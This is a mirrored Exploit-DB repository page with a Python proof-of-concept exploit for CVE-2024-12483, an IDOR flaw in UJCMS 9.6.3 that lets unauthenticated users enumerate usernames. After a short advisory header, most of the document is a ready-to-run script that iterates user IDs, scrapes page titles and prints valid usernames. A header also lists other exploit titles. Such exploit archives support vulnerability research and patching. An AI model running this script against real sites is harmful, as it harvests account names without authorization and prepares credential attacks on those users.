bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/webapps/52264.py
Exploit-DB 8ce497b2c8 DB: 2025-04-19 
8 changes to exploits/shellcodes/ghdb

Langflow 1.3.0 -  Remote Code Execution (RCE)

Apache Commons Text  1.10.0 - Remote Code Execution

Hunk Companion Plugin 1.9.0 - Unauthenticated Plugin Installation

UJCMS 9.6.3 - User Enumeration via IDOR

Inventio Lite 4 - SQL Injection

KiviCare Clinic & Patient Management System (EHR) 3.6.4 - Unauthenticated SQL Injection

Tatsu 3.3.11 - Unauthenticated RCE
2025-04-19 00:16:29 +00:00

61 lines
No EOL
2.4 KiB
Python
Executable file
Raw Blame History

# Exploit Title: UJCMS 9.6.3 User Enumeration via IDOR
# Exploit Author: Cyd Tseng
# Date: 11 Dec 2024
# Category: Web application
# Vendor Homepage: https://dromara.org/
# Software Link: https://github.com/dromara/ujcms
# Version: UJCMS 9.6.3
# Tested on: Linux
# CVE: CVE-2024-12483
# Advisory: https://github.com/cydtseng/Vulnerability-Research/blob/main/ujcms/IDOR-UsernameEnumeration.md
"""
An Insecure Direct Object Reference (IDOR) vulnerability was discovered in UJCMS version 9.6.3 that allows unauthenticated enumeration of usernames through the manipulation of the user id parameter in the /users/id endpoint. While the user IDs are generally large numbers (e.g., 69278363520885761), with the exception of the admin and anonymous account, unauthenticated attackers can still systematically discover usernames of existing accounts.
"""
import requests
from bs4 import BeautifulSoup
import time
import re
BASE_URL = 'http://localhost:8080/users/{}' # Modify as necessary!
HEADERS = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Connection': 'keep-alive'
}
def fetch_user_data(user_id):
url = BASE_URL.format(user_id)
try:
response = requests.get(url, headers=HEADERS)
if response.status_code == 200:
soup = BeautifulSoup(response.content, 'html.parser')
title = soup.title.string.strip()
if title.lower() != '404':
username = re.sub(r' - UJCMS演示站$', '', title)
return user_id, username
return None
except requests.RequestException as e:
print(f"Error fetching data for user ID {user_id}: {e}")
return None
def user_id_generator(start, end):
for user_id in range(start, end + 1):
yield user_id
def enumerate_users(start_id, end_id):
for user_id in user_id_generator(start_id, end_id):
user_data = fetch_user_data(user_id)
if user_data:
print(f"Valid user found: ID {user_data[0]} with username '{user_data[1]}'")
time.sleep(0.1)
if __name__ == '__main__':
start_id = int(input("Enter the starting user ID: "))
end_id = int(input("Enter the ending user ID: "))
print(f"Starting enumeration from ID {start_id} to {end_id}...")
enumerate_users(start_id, end_id)
Reference in a new issue View git blame Copy permalink